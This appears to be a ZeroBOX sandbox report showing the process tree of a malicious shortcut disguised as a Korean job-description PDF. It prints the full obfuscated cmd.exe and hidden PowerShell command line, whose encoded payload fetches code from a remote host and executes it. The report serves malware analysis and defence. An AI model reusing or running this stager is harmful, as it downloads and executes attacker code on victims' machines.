popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "djoMrZ" C:\Users\test22\AppData\Local\Temp\MLB_KOREAN_JOB_DESCRIPTION.pdf.lnk

    2552

    • cmd.exe "C:\WINDOWS\system32\cmd.exe" /c set "TjnHYfRxWa=YQBzAGUANg" && set "XxwtDJaPct=sAIAAkAHkA" && set "bDwtozZyqE=0APQAiACkA" && set "BIVGlNsNoU=dAByAHkAew" && set "TcluocXKfb=AgAC0AZwB0" && set "zMIBZriQBh=QAdQByAGkA" && set "ZZusqJZmtQ=xecutionPo" && set "yFXoGrtJrL=4AYwBvAGQA" && set "MmMqeWIOFi=ACAAMAApAA" && set "EqIdOrRmjn=BTAGwAZQBl" && set "qtKFTTYurE=AGkAbgBnAC" && set "snEVWQpOuP=AEcAVgBpAE" && set "TMaEbbgsQT=bgB0ADsACg" && set "RmAFlbgkZU=MAIAAxADUA" && set "mEveuglXTa=AAoAJABjAG" && set "RiGCrpUpab=AHcAWgB3AD" && set "NWLWNbWdCY=QwBvAG4Adg" && set "uKwwRshDBH=cQB1AGUAcw" && set "TyzfJstCFR=BNAG0AVQAy" && set "NfTMXIilyz=B5AGUAKQA7" && set "fFsezeqgeq=QAZQBuAHQA" && set "KgWpffnYAW=A9AD0AIgAp" && set "zhraxSSzuI= "" powers" && set "SdmiBxLDtW=ADoAOgBGAH" && set "zwZZhreAAq=AHQALgBFAG" && set "roifXiuEUg=EASABSADAA" && set "rOmxHGNTgd=AEMASQBJAC" && set "qZLdtCgkin=BuAGcAKABb" && set "fynWIDORfN=AoAFsAUwB5" && set "ihwOxETVfk=Command JA" && set "dchNDOhYMZ=AEkALgBHAG" && set "QJhOrKXjCB=AAkAewAKAA" && set "MhrUTNGYFx=B0AHIAaQBu" && set "lfZAeaeKgt=ACkAOwAKAC" && set "kKsTLYyupN=AHcAcAAgAC" && set "sNPYhFfxWg=AGIAeQBlAD" && set "TpSIyPtwZv=UAdABTAHQA" && set "KkkXMtHfZU=ZQBtAC4AVA" && set "WHNdSAzHNf=BCAHoATAAy" && set "rNyOCSQIKg=BuAHYAbwBr" && set "dWYFHRStXF=0AWwBTAHkA" && set "bkVkhPTSec=NoLogo -No" && set "QeVrJoypwB=ADEAOwAKAA" && set "RUaWyRHQuU=IAbABZADIA" && set "FpUOTNStKA=AGcAKAAiAG" && set "VYNegyYlXL=AGUAVwBSAG" && set "qIKCUwBAij=0ALgBDAG8A" && set "EoowUnpyYh=indowStyle" && set "DfsnUcTgFg=AFkAagBnAH" && set "BnCmaRDKwV=IAA9ACAAMQ" && set "LZfAavpFYm=AEUAbgBjAG" && set "QEhDXYbieC=UAKAAkAGMA" && set "VLQrvNbsvi=AHoATABuAF" && set "uJfzqLEKfc=KQA7AAoAJA" && set "sBejxLYLRs=IAA9ACAAKA" && set "CABYzgxxvr=bwB1AG4AdA" && set "ucVjukLiUo=start /min" && set "briQMnmKwu=8AbgB0AGUA" && set "cUspthchmF=MAeQBzAHQA" && set "bDCaPovznl=ZwB2AFoAZw" && set "lLiNvvsyHR=AuAFQAZQB4" && set "lvMKFTtJON=AHAAIAAtAH" && set "yJRnVfsvnj=AGMAbwBuAH" && set "usjZfmaFEE=AHAAPQBbAF" && set "dxVJkbAfud=BlAHgAdAAu" && set "fXwjcPVYLt=cAByAGUAcw" && set "GoGsnQnaWQ=eABsAEwAMw" && set "EUegkQmPFZ=AFMAeQBzAH" && set "AHQVhJQFkw=gAIgBhAFcA" && set "lbWAUubWaU=bgB2AGUAcg" && set "jUrJQWBMnl=AgAC0APQAg" && set "FncKXuOuBq=AJAAkAYgBy" && set "ovxVxqlhIr=IAAtAFUAcw" && set "aDaRlJPjdb=BlAHIAdABd" && set "bnJWBwevld=0AQgBhAHMA" && set "qheQdOsxFy=ZQA2ADQAUw" && set "eqgCyTWOdO=YwBIAE0ANg" && set "brdcQqNkUD=AKAAkACQAk" && set "kiRfpiioRm=B6AGQAbABN" && set "mSfXwDbnfy=AKAH0ACgA=" && set "hKWOQKomJA=WgBqAGcAeg" && set "CdfUWpIjbg=NABaAEQAYw" && set "QfQNxampWp=BMAHkAOQB0" && set "NhpKzjZEKH=0AVwBWAGgA" && set "jEDkeIrPfl=cATQBXAEUA" && set "EUzKheKIZQ=IAA9ACAASQ" && set "odfhiqYUUz=B5AGQAdQB2" && set "sceysoispa=gAZABHAEYA" && set "ehEGAHjiti=IAbwBtAEIA" && set "iLjcIMbryB=ACAAJABjAG" && set "ZHfDZDjgfR=UAYgBSAGUA" && set "ytLfgwbtYo=A6ADoAQQBT" && set "DIqxJWEcWP=AkAGkAcwB1" && set "gsxhMcHUWS=AJAAkASQBu" && set "CUqShwKEaH=sACgAJAH0A" && set "rppWWkilnL=8AZABpAG4A" && set "GyqShYfrXf=AGgAaQBsAG" && set "ZOXKrOSKdN=YQByAHQALQ" && set "hsfywJokQA=EAcgBzAGkA" && set "bCqmXvKujn=B0AF0AOgA6" && set "oIvYUHvtVL=B0ACAALQBV" && set "xaWfxreeLe=AHMAdABlAG" && set "zuUXwkFdnO=s -Encoded" && set "GXxBHSTMdH=MgBRADAAWQ" && set "rsIQUsNlkm=aQBuAGcAXQ" && set "ETqoSfTRik=UwB0AHIAaQ" && set "FVFJBFYJfr=ZwBdADoAOg" && set "btnYpOFMnb=BzAGkAbwBu" && set "VOaCORREdU=8AdQBuAHQA" && set "qyuXVxOLbl=AEYAcgBvAG" && set "FhqfnpmgSH= hidden -E" && set "wMESCJLjmS=bwB1AG4AdA" && set "QxZTecsJUN=A1AEwAbQBw" && set "OEzksKkxlb=AGUAYQBrAD" && set "TatfGwoMOf=cwB0AGUAbQ" && set "LmOCYEfCmj=AGkAYwBQAG" && set "uuqfIlaqLf=UALQBFAHgA" && set "JjtTKfdVpE=kACQAkAGMA" && set "wOmIWVIxUD=OwAKAAkAfQ" && set "vWzfPwZZCL=AGUALQBXAG" && set "mqBIVdfolH=kACQBTAHQA" && set "ReqWKmxvIW=NQBlAEcANQ" && set "ZpivkNWzqU=licy bypas" && set "APrDhxXOtJ=AwADsACgB3" && set "vOKQgfXssa=oAewAKAAkA" && set "fLfoRKHUPY=AHIAaQAgAC" && set "gxfsAbxZwa=AFYAbQBPAF" && set "IoUEJKKCup=A0AFMAdABy" && set "FIBEVNoySs=CgAJAGMAYQ" && set "wGAGFuCgcm=cgBpAG4AZw" && set "iPluMIEhFh=BlAEIAYQBz" && set "bsSNPRwkSd=ZAB1AHYAYg" && set "VeHElgDcva=BvAGUAbQBO" && set "IJCSLLAcox=QAdQByAGkA" && set "FhMwlnEESP=hell.exe -" && set "rWiAduopww=Profile -W" && set "bIgWAgOjfP=4ARwBlAHQA" && set "TfrYJcMrsc=cASQAzAE0A" && set "lJUzkPKMYd=AHYAbwBrAG" && set "GWMjUKeJXq=BBAFMAQwBJ" && set "ySjgGpmQmr=B0AGMAaAAK" && set "pIVrtuwCCH=BpAHMAdQB3" && set "yzlxQSyhfd=bgBnADsACg" && set "ISoiKxxYFC=QAZQBtAC4A" && call %ucVjukLiUo%%zhraxSSzuI%%FhMwlnEESP%%bkVkhPTSec%%rWiAduopww%%EoowUnpyYh%%FhqfnpmgSH%%ZZusqJZmtQ%%ZpivkNWzqU%%zuUXwkFdnO%%ihwOxETVfk%%odfhiqYUUz%%sNPYhFfxWg%%dWYFHRStXF%%TatfGwoMOf%%lLiNvvsyHR%%zwZZhreAAq%%yFXoGrtJrL%%rsIQUsNlkm%%ytLfgwbtYo%%rOmxHGNTgd%%bIgWAgOjfP%%ETqoSfTRik%%qZLdtCgkin%%EUegkQmPFZ%%ISoiKxxYFC%%NWLWNbWdCY%%aDaRlJPjdb%%SdmiBxLDtW%%ehEGAHjiti%%TjnHYfRxWa%%IoUEJKKCup%%qtKFTTYurE%%AHQVhJQFkw%%GoGsnQnaWQ%%WHNdSAzHNf%%gxfsAbxZwa%%TfrYJcMrsc%%GXxBHSTMdH%%kiRfpiioRm%%snEVWQpOuP%%NhpKzjZEKH%%hKWOQKomJA%%TyzfJstCFR%%DfsnUcTgFg%%jEDkeIrPfl%%CdfUWpIjbg%%QxZTecsJUN%%RiGCrpUpab%%bDwtozZyqE%%uJfzqLEKfc%%pIVrtuwCCH%%usjZfmaFEE%%cUspthchmF%%KkkXMtHfZU%%dxVJkbAfud%%LZfAavpFYm%%rppWWkilnL%%FVFJBFYJfr%%GWMjUKeJXq%%dchNDOhYMZ%%TpSIyPtwZv%%wGAGFuCgcm%%fynWIDORfN%%xaWfxreeLe%%qIKCUwBAij%%lbWAUubWaU%%bCqmXvKujn%%qyuXVxOLbl%%bnJWBwevld%%qheQdOsxFy%%MhrUTNGYFx%%FpUOTNStKA%%roifXiuEUg%%eqgCyTWOdO%%QfQNxampWp%%VYNegyYlXL%%sceysoispa%%ReqWKmxvIW%%VeHElgDcva%%VLQrvNbsvi%%RUaWyRHQuU%%bDCaPovznl%%KgWpffnYAW%%lfZAeaeKgt%%zMIBZriQBh%%sBejxLYLRs%%DIqxJWEcWP%%kKsTLYyupN%%XxwtDJaPct%%bsSNPRwkSd%%NfTMXIilyz%%mEveuglXTa%%VOaCORREdU%%BnCmaRDKwV%%APrDhxXOtJ%%GyqShYfrXf%%QEhDXYbieC%%CABYzgxxvr%%TcluocXKfb%%MmMqeWIOFi%%vOKQgfXssa%%BIVGlNsNoU%%brdcQqNkUD%%yJRnVfsvnj%%fFsezeqgeq%%EUzKheKIZQ%%rNyOCSQIKg%%vWzfPwZZCL%%ZHfDZDjgfR%%uKwwRshDBH%%oIvYUHvtVL%%fLfoRKHUPY%%IJCSLLAcox%%ovxVxqlhIr%%iPluMIEhFh%%LmOCYEfCmj%%hsfywJokQA%%yzlxQSyhfd%%gsxhMcHUWS%%lJUzkPKMYd%%uuqfIlaqLf%%fXwjcPVYLt%%btnYpOFMnb%%iLjcIMbryB%%briQMnmKwu%%TMaEbbgsQT%%FncKXuOuBq%%OEzksKkxlb%%CUqShwKEaH%%FIBEVNoySs%%ySjgGpmQmr%%QJhOrKXjCB%%JjtTKfdVpE%%wMESCJLjmS%%jUrJQWBMnl%%QeVrJoypwB%%mqBIVdfolH%%ZOXKrOSKdN%%EqIdOrRmjn%%lvMKFTtJON%%RmAFlbgkZU%%wOmIWVIxUD%%mSfXwDbnfy%

      2704

      • powershell.exe powershell.exe -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand JAB5AGQAdQB2AGIAeQBlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAFcAeABsAEwAMwBCAHoATAAyAFYAbQBPAFcASQAzAE0AMgBRADAAWQB6AGQAbABNAEcAVgBpAE0AVwBWAGgAWgBqAGcAegBNAG0AVQAyAFkAagBnAHcATQBXAEUANABaAEQAYwA1AEwAbQBwAHcAWgB3AD0APQAiACkAKQA7AAoAJABpAHMAdQB3AHAAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAGEASABSADAAYwBIAE0ANgBMAHkAOQB0AGUAVwBSAGgAZABHAEYANQBlAEcANQBvAGUAbQBOAHoATABuAFIAbABZADIAZwB2AFoAZwA9AD0AIgApACkAOwAKACQAdQByAGkAIAA9ACAAKAAkAGkAcwB1AHcAcAAgACsAIAAkAHkAZAB1AHYAYgB5AGUAKQA7AAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADsACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAAoAewAKAAkAdAByAHkAewAKAAkACQAkAGMAbwBuAHQAZQBuAHQAIAA9ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGkAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABjAG8AbgB0AGUAbgB0ADsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAJAGMAYQB0AGMAaAAKAAkAewAKAAkACQAkAGMAbwB1AG4AdAAgAC0APQAgADEAOwAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwAKAAkAfQAKAH0ACgA=

        2808

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf